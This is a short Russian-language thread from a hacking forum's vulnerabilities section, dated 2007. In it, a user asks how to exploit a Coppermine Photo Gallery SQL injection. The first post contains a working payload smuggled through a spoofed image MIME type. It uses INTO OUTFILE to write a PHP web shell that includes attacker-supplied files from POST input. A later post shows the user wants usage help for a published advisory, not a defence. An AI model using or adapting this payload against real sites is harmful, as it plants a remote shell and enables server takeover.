HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Не знаю ПРО MiME
  #1  
Старый 30.04.2007, 17:28
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами: 10038327

Репутация: 251


Question Не знаю ПРО MiME

Как это сделать.Типа код добавить в файл расширением изображения!
мутим картинку, с левым MIME type в Web сервере (lighttpd):

"image/jpg'/**/into/**/outfile/**/'/home/www/gallery/albums/edit/pic.php'/**/fields/**/terminated/**/by/**/''/**/optionally/**/enclosed/**/by/**/'<?if($_POST[nst]){include($_POST[nst]);}die;?>",
 
Ответить с цитированием

  #2  
Старый 01.05.2007, 15:15
SQLHACK
Голос разума
Регистрация: 27.09.2006
Сообщений: 529
С нами: 10326626

Репутация: 1617


По умолчанию

бред какой-то
>>>Типа код добавить в файл расширением изображения!
так ты хочешь внутрь файла запихать ? там mime не прописывается.
или ты хочешь послать на серв картинку c mime который ты описал?
вопрос: а что это юзает инъекцию в lighttpd ?

поясни чё ты конкретно хочешь сделать ?
 
Ответить с цитированием

  #3  
Старый 01.05.2007, 19:25
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
С нами: 10038327

Репутация: 251


По умолчанию

Короче челы с NST нашли баг в Coppermine Photo Gallery vX.X.X<=1.4.10 - SQL Injection / Remote Shell [link]http://nst.void.ru/?q=papers&cat_where=advisories&show=22[/link]
Я хочу узнать как это юзать.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Про одно всё, про  одно..... Николь Болталка 20 01.02.2009 18:31
Про нас, про мужчин! SladerNon Болталка 27 21.02.2007 16:44
Статья от novichka про АНтичат. Егорыч+++ Болталка 48 14.07.2006 17:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.